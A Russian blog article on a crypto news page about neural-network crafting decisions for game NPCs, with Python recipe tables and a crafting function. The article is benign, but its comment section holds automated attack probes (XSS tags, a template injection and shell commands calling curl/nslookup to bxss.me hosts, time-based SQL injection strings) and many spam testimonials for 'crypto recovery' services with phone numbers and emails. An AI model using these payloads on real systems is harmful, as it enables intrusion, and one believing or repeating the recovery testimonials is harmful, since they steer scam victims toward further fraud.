Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9505 / Markets: 114717
Market Cap: $ 3 663 340 658 986 / 24h Vol: $ 222 537 540 211 / BTC Dominance: 58.861607907734%

Н Новости

Нейросетевой интеллект для NPC: Крафтовый интеллект

Нейронные сети в играх можно использовать не только для генерации картинок, звука и простыней текста. И даже не для того, чтобы предугадывать желания игрока. А что, если применить их для того, для чего они изначально задумывались – интеллектуального поведения и принятия решений?

Начнём с малого: допустим, мы создаем NPC, которые умеют собирать предметы по заданным правилам. Наша цель: создать «крафтовый» интеллект, т.е. такой интеллект, который выбирает, что будет делать NPC из предметов в его инвентаре. Такую штуку можно попробовать реализовать с помощью конченных конечных автоматов, поведенческих деревьев (behaviour tree) или ещё как-нибудь. Но, когда рецептов много, ингредиенты пересекаются, а потребности NPC меняются, такое дерево очень быстро разрастется до трудноподдерживаемого состояния. А если у нас вдруг что-то поменялось в технологической схеме?

В статье мы кратко опишем нейросетевой подход к этой задаче и полученные результаты.

Крафтовая система

Моя система крафта довольно навороченная. Предметы состоят из определенного материала (в указанном количестве), могут быть стэкуемыми (складываться в один слот) и относится к разным типам (любому их сочетанию), например:

ITEMS = {
    'stone': {'stack': True, 'material': 'stone', 'nmat': 2, 'type': {'raw', 'hammer'}, 'cost': 0.0},
    'flint': {'stack': True, 'material': 'stone', 'nmat': 1, 'type': {'raw', 'cutter'}, 'cost': 0.0},
    'piece of leather': {'stack': True, 'material': 'leather', 'nmat': 2, 'type': {'raw'}, 'cost': 0.0},
    'vein': {'stack': True, 'material': 'leather', 'nmat': 1, 'type': {'rope'}, 'cost': 0.0 },
    'bones': {'stack': True, 'material': 'bone', 'nmat': 2, 'type': {'raw'}, 'cost': 0.0 },
    'piece of metal': {'stack': True, 'material': 'metal', 'nmat': 2, 'type': {'raw'}, 'cost': 0.0},
    'vegs': {'stack': True, 'material': 'fiber', 'nmat': 1, 'type': {'raw'}, 'cost': 0.0},
    'wooden stick': {'stack': False, 'material': 'wood', 'nmat': 2, 'type': {'raw', 'handle'}, 'cost': 0.0},
    'rope': {'stack': True, 'material': 'fiber', 'nmat': 1, 'type': {'rope'}, 'cost': 0.0 },
    'stone hammer': {'stack': False, 'material': 'stone', 'nmat': 2, 'type': {'hammer', 'weapon'}, 'cost': 2.0},
    'bone awl': {'stack': False, 'material': 'bone', 'nmat': 2, 'type': {'awl'}, 'cost': 0.0 },
    'bone knife': {'stack': False, 'material': 'bone', 'nmat': 2, 'type': {'cutter'}, 'cost': 0.0 },
    'bone spear': {'stack': False, 'material': 'bone', 'nmat': 2, 'type': {'weapon'}, 'cost': 2.0},
    'metal knife': {'stack': False, 'material': 'metal', 'nmat': 2, 'type': {'weapon', 'cutter'}, 'cost': 0.0},
    'leather ribbon': {'stack': True, 'material': 'leather', 'nmat': 1, 'type': {'rope', 'raw'}, 'cost': 0.0},
    'metal spear': {'stack': False, 'material': 'metal', 'nmat': 2, 'type': {'weapon'}, 'cost': 2.0},
    'stone axe': {'stack': False, 'material': 'stone', 'nmat': 2, 'type': {'weapon'}, 'cost': 2.0},
    'skin': {'stack': False, 'material': 'leather', 'nmat': 2, 'type': {'armor'}, 'cost': 4.0},
    'fibers': {'stack': True, 'material': 'fiber', 'nmat': 2, 'type': {'raw'}, 'cost': 0.0 },
    'bone necklace': {'stack': False, 'material': 'bone', 'nmat': 2, 'type': {'jewelry'}, 'cost': 2.0},
    'sling': {'stack': False, 'material': 'leather', 'nmat': 2, 'type': {'weapon'}, 'cost': 2.0},
    'wooden club': {'stack': False, 'material': 'wood', 'nmat': 2, 'type': {'weapon'}, 'cost': 0.0},
    'bone mace': {'stack': False, 'material': 'bone', 'nmat': 2, 'type': {'weapon'}, 'cost': 4.0},
    'leather shield': {'stack': False, 'material': 'leather', 'nmat': 2, 'type': {'armor'}, 'cost': 6.0},
    'metal mace': {'stack': False, 'material': 'metal', 'nmat': 2, 'type': {'weapon'}, 'cost': 5.0},
}

Код привожу на питоне, для таких вспомогательных утилит он оптимален. Удобно проверять наличие элемента в множестве, работать со строковыми индексами, при желании можно подключать фреймворки машинного обучения вроде Pytorch. В самом проекте на C++, естественно, никаких строк, все обращения к свойствам предметов или рецептов по их индексу.

Кроме предметов, есть рецепты. В рецепте указано, какой предмет получается, нужен ли инструмент (инструменты пересекаются с типами предметов) и какие нужны ингредиенты. Ингредиенты могут быть заданы по идентификатору (нужен конкретный предмет), по материалу (нужен определенный материал) и по типу (нужен определенный тип). Предмет в качестве материала можно использовать только если у него в типах есть ‘raw’ (сокращение от raw material – сырьё). Это единственный захардкоденный идентификатор, остальные типы, материалы и предметы могут называться произвольным образом.

RECIPES = [
    {'result': 'rope', 'tool1': {}, 'ingrs': [['id', 'fibers', 3]]},
    {'result': 'stone hammer', 'tool1': {}, 'ingrs': [['type', 'rope', 1], ['type', 'handle', 1], ['id', 'stone', 1]]},
    {'result': 'bone awl', 'tool1': {'cutter'}, 'ingrs': [['material', 'bone', 2]]},
    {'result': 'bone knife', 'tool1': {'hammer'}, 'ingrs': [['material', 'bone', 3]]},
    {'result': 'bone spear', 'tool1': {}, 'ingrs': [['type', 'rope', 1], ['type', 'handle', 1], ['id', 'bone awl', 1]]},
    {'result': 'metal knife', 'tool1': {'hammer'}, 'ingrs': [['material', 'metal', 2]]},
    {'result': 'leather ribbon', 'tool1': {'cutter'}, 'ingrs': [['material', 'leather', 2]]},
    {'result': 'metal spear', 'tool1': {}, 'ingrs': [['type', 'rope', 1], ['type', 'handle', 1], ['id', 'metal knife', 1]]},
    {'result': 'stone axe', 'tool1': {}, 'ingrs': [['type', 'rope', 1], ['type', 'handle', 1], ['id', 'flint', 1]]},
    {'result': 'skin', 'tool1': {'awl'}, 'ingrs': [['type', 'rope', 1], ['material', 'leather', 3]]},
    {'result': 'fibers', 'tool1': {'hammer'}, 'ingrs': [['id', 'vegs', 1]]},
    {'result': 'bone necklace', 'tool1': {}, 'ingrs': [['type', 'rope', 1], ['id', 'bone knife', 3]]},
    {'result': 'sling', 'tool1': {'awl'}, 'ingrs': [['type', 'rope', 1], ['material', 'leather', 2]]},
    {'result': 'wooden club', 'tool1': {'cutter'}, 'ingrs': [['id', 'wooden stick', 1]]},
    {'result': 'bone mace', 'tool1': {}, 'ingrs': [['id', 'wooden club', 1], ['id', 'bone knife', 2]]},
    {'result': 'leather shield', 'tool1': {'awl'}, 'ingrs': [['type', 'handle', 4], ['material', 'leather', 4]]},
    {'result': 'metal mace', 'tool1': {'hammer'}, 'ingrs': [['id', 'wooden club', 1], ['material', 'metal', 2]]},
]

Например, для каменного молота нужна одна веревка (любой предмет с ‘rope’ in type), одна рукоятка (любой предмет с ‘handle’ in type) и один камень (тут прямо именно камень, никаких вариантов). Обратите внимание, что рецепты – это список, а не словарь. Т.е. в принципе, может быть, сколько угодно рецептов, дающих один и тот же предмет. Если представить это в виде диаграммы получится следующая картинка:

Синие сплошные линии – необходимо потратить, черные пунктирные – необходимо наличие (инструмент).
Синие сплошные линии – необходимо потратить, черные пунктирные – необходимо наличие (инструмент).

Как вам? Хотите написать алгоритм под такую задачу? В данном примере граф сильно связанный: многие рецепты требуют веревку, а к этому типу относятся аж 3 предмета: веревка, жилы и кожаная лента. Привожу также саму функцию крафта craft_dict, которая находит индексы предметов в инвентаре (список/массив), которые будут использованы для крафта, и возвращает их, вместе с общим результатом (нет инструментов / нет ингредиентов / нет места / нет чего-либо / успех). Функция жадная, не ищет оптимальный вариант, а просто первый попавшийся. Для работы требует вспомогательную функцию for_craft, которая возвращает какое количество ингредиентов для рецепта данный предмет может дать:

# determine is this item (name, amount) can be used for craft? Return availiable number (in units of crafted items)
# comp is component of recipe: [type(id/material/type), name, number]
def for_craft(name: str, amount: int, comp: list):
    global ITEMS
    item = ITEMS[name]
    if comp[0] == 'id':
        if name == comp[1]:       
            return min(amount, comp[2])         # how much but not more than needed
        else:
            return 0

    elif comp[0] == 'material':
        if 'raw' in item['type'] and comp[1] == item['material']:     #  only for raw materials
            nmat = amount * item['nmat']   # availiable number of material
            return min(nmat, comp[2])
        else:
            return 0

    elif comp[0] == 'type':
        if comp[1] in item['type']:      
            return min(amount, comp[2])
        else:
            return 0

# verify posibility of craft by recipe index and determine items in invenory used for craft.
# greedy strategy, use the first suitable variant
# inventory is a list of [id, amount]
# RETURN result: 'no some', 'no tools', 'no room', 'no ingr' or 'success' and dictionary {index_in_inventory: used_number}
# in the case 'no ingr' also return a list of missed ingridients
def craft_dict(inv: list, recipe: int):
    global ITEMS, RECIPES, MAX_INV
    rec = RECIPES[recipe]
    l = len(inv)        # number of items in inventory

    # fast verification of impossibility
    if l < (len(rec['ingrs']) + (1 if rec['tool1'] else 0)):
        return 'no some', None        # no tool or no ingredients, we don't know exactly

    # 1: verify tools presence (if needed), greedy stategy, determine index of tool in inventory
    tool_ind = -1
    if rec['tool1']:
        for i in range(l):
            if rec['tool1'].issubset(ITEMS[inv[i][0]]['type']):
                tool_ind = i
                break
        if tool_ind == -1:
            return 'no tools', None

    # 2 looking for ingredients, skipping the index of tool
    ni = len(rec['ingrs'])      # number of ingredients
    mask = [True] * ni          # mask that we still search this component of the recipe
    needs = [comp[2] for comp in rec['ingrs']]      # list of needed components amount
    amounts = {}                # dictionary of amounts that we need to spend for each index
    i = 0
    while i < l and any(mask):
        if i != tool_ind:
            for j in range(ni):
                if mask[j]:
                    n = for_craft(inv[i][0], inv[i][1], rec['ingrs'][j])
                    if n:
                        dec = min(n, needs[j])      
                        needs[j] = needs[j] - dec
                        if not needs[j]:
                            mask[j] = False
                        if rec['ingrs'][j][0] == 'material':
                            amounts[i] = math.ceil(dec / ITEMS[inv[i][0]]['nmat'])
                        else:
                            amounts[i] = dec
                        break       # no need to verify another components
        i += 1

    if any(mask):       # loop is finished, but not all igridients are found:
        shortage = [ingr  for i, ingr in enumerate(rec['ingrs']) if mask[i]]
        return 'no ingr', shortage

    # verify room (only if inventory is full)
    if l == MAX_INV:
        no_room = True
        for k,v in amounts.items():
            if inv[k][1] == v:      # we will spend all these items and clear place for craft
                no_room = False
                break
        if no_room:
            return 'no room', None

    return 'success', amounts  # {index: number}

В принципе, по этой функции уже видно, что её хочется вызывать как можно реже (и это вы ещё не видели её сишный аналог). Если нам надо проверить, что мы можем сделать, нам нужно прогнать эту функцию по всем рецептам, по всему инвентарю. И вот это то, от чего мы хотим избавится. Мы хотим построить нейронку, которая разок взглянув на инвентарь быстро бы дала нам ответ, какие рецепты возможны и какие нужно делать прямо сейчас.

Реализация

Чтобы это реализовать будем оперировать не инвентарем и предметами, а их эмбеддингами. Эмбеддинги или скрытое представление – это такой тензор (обычно одномерный, т.е. вектор), который шифрует некую сущность. Пускай у нас будет эмбеддинг всего инвентаря и эмбеддинги предметов. И есть некая нейронная сеть, которая обновляет эмбеддинг инвентаря, всякий раз, когда мы добавляем и удаляем оттуда предмет. Так как эти события происходят не слишком часто, мы несколько снижаем вычислительную нагрузку. Да, тогда получается, что NPC должен кроме инвентаря хранить где-то его эмбеддинг, но это не такая уж большая плата за результат. Это обновление должно быть основано на каких-то очень простых правилах: сложениях/умножениях, чтобы выполнятся быстро.

Эмбеддинги предметов во время игрового процесса константы. Они оптимизируются здесь, в этом питоновском скрипте, ну а потом их можно просто распечатать и захардкодить в сишном коде, либо сделать загрузчик. Первый вариант проще и быстрее, а во втором придётся динамически выделять память, но зато можно сделать обновление даже без перезапуска игры.

Иногда у нас есть неприятная ситуация, когда разный предмет в одном рецепте может выполнять разные функции (подходить и по типу, и по айдишнику, например). Зачастую в этих ситуациях нейроночка считает, что сделать предмет можно, а на самом деле не хватает ингредиентов. Если не предоставить никакой обратной связи, то можно получить замкнутый цикл. NPC будет раз за разом пытаться сделать предмет, который нейронка советует сделать. Для решения этой проблемы я ещё ввел «эмбеддинг дефицита», который может блокировать рецепты. Он обновляется, когда функция крафта вернула «нет ингредиента» и снимается при добавлении некоторых предметов в инвентарь.

А что же оптимизировать?

Можно формально разделить нейронку на две части: первая отвечает на вопрос «какой из рецептов можно сделать?», а вторая – «какой нужно сделать?». Первую часть можно рассматривать как врожденное знание, незачем это оптимизировать в ходе игры, можно обучить этому нейронную сеть заранее и зафиксировать. Мы ведь не хотим, чтобы NPC сто лет пытался собрать самолёт из каменных топоров в духе reinforcement learning. А вот вторую часть можно сделать динамичной, зависящей от желаний NPC. Сейчас он хочет сделать одно, завтра – другое, в зависимости от текущих потребностей. Для этого предусмотрен режим «целевой предмет», в котором минимизируется количество операций, необходимых для крафта желаемого предмета.

Эксперимент

Результаты проверены на простом модельном эксперименте. Каждый ход NPC под управлением нейронки предлагается выбор: поднять предмет с пола или попытаться скрафтить предмет. Предмет на полу каждый ход случайный из некоего списка:

SOURCES = {'stone', 'flint', 'piece of leather', 'vein', 'bones', 'piece of metal', 'vegs', 'wooden stick'}

Какие мы можем посмотреть метрики? Failed Craft Rate: доля проваленных попыток крафта (ИИ пытается сделать предмет, но это невозможно). Craft Rate: отношение успешных попыток крафта к общему числу действий – показывает, насколько часто нейронка выбирает действие крафта.

Результаты

Привожу статистику решений для режима «целевой предмет». Делал 10 прогонов, каждый по 100 ходов, результаты усреднил. Failed Craft Rate равен 0 во всех случаях.

Целевой предмет

Доля крафта, %

Количество созданных целевых предметов за 100 ходов

Leather shield

7.2

2.7

Metal mace

22.4

8.9

Привожу так же статистику созданных предметов для одного из прогонов в каждом случае:

{'fibers': 3, 'metal knife': 1, 'bone awl': 1, 'leather shield': 3}
{'metal knife': 1, 'wooden club': 9, 'fibers': 3, 'metal mace': 8}

Согласно рецептам, для создания кожаного щита нужно шило, вот NPC его и создает, а металлическая булава получается из дубинки. При этом NPC зачем-то создает волокна и металлический нож в ряде случаев. Но в целом я доволен результатом – ни разу нейронка не предложила сделать что-то, что невозможно сделать при данном инвентаре.

Чтобы не было впечатления, что результат привязан к конкретному крафтовому дереву, попробуем другую технологическую схему. Для простоты назвал предметы абстрактными именами, ингредиенты взял только по айдишнику, но зато заложил длинную цепочку с боковым ответвлением, чтобы проверить, не застрянет ли в них NPC.

Дерево крафта 2
Дерево крафта 2

Достаточно лишь поменять объявление предметов и рецептов в скрипте, чтобы всё работало. Естественно, что это объявление можно вынести, например, в экселевский файл и заставить скрипт парсить его. Тогда можно будет вообще не прикасаться к коду.

Для простоты пускай на полу лежит только предмет А, задаём целевой предмет H и, вуаля, за 100 ходов NPC наштамповал: {'B': 18, 'E': 17, 'F': 17, 'G': 8, 'H': 4}; доля крафта - 64%; доля фэйлов – 0. Напомню, что целевой предмет можно задать динамически, делая поведение NPC более хитрым и непредсказуемым. А ещё можно разным NPC задать разные целевые предметы и предложить им обмениваться ими. Простор для фантазии огромен.

Итог и дальнейшие планы

Как видим, нейросетевой ИИ справляется с выбором рецепта крафта в конкретной ситуации. Он не предлагает делать то, что невозможно сделать и целенаправленно крафтит то, что задано.

Мне же не надо писать бесконечный набор правил if…then, и нет нужды переписывать все эти правила, если что-то поменялось в технологической схеме.

К сожалению, пока я не внедрил эту разработку в свой проект. Дело в том, что у меня технологическое дерево состоит не только из крафта. Например, металл можно получить из руды только в обжиговых печах, которые нужно строить. Сейчас NPC их строят и умеют ими пользоваться, но это реализовано традиционными алгоритмами. Планирую в скором времени сделать эмбеддинги построек и как-то подружить их с эмбеддингами предметов, чтобы нейросетевой интеллект мог принимать решения по всему технологическому процессу.

В идеале хочется сделать, чтобы NPCразвивался в буквальном смысле – постепенно учился какому-то сложному поведению, а не чисто формально увеличивал свои статы и открывал умения по достижению нужных циферок.

Из анекдотов про Dwarf Fortress:

- Сэм, какое самое сильное животное в Dwarf Fortress?

- Карп, Билл

- Почему, Сэм?

- Пока ты ходишь – карп плавает и качается, пока ты отдыхаешь – карп плавает и качается.

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 09.10.25 11:05 marcushenderson624

    Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 11.10.25 04:41 luciajessy3

    Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…

  • 11.10.25 10:44 Tonerdomark

    A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 01:12 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 12.10.25 19:53 Tonerdomark

    A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.

  • 12.10.25 21:36 blessing

    Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.

  • 13.10.25 01:11 elizabethrush89

    God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: 